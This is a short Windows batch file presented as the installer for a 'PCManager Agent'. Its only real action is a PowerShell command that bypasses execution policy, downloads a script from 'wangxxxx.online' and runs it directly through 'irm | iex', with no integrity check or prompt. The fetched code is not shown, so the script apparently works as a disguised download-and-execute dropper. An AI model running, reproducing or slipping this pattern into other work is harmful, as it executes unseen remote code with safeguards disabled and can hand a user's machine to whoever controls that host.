@echo off
setlocal
title PCManager Agent Installer

echo Downloading PCManager installer...
echo Version: win-agent-0.1.23
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm 'https://wangxxxx.online/install.ps1' | iex"
if errorlevel 1 (
  exit /b 1
)
exit /b 0
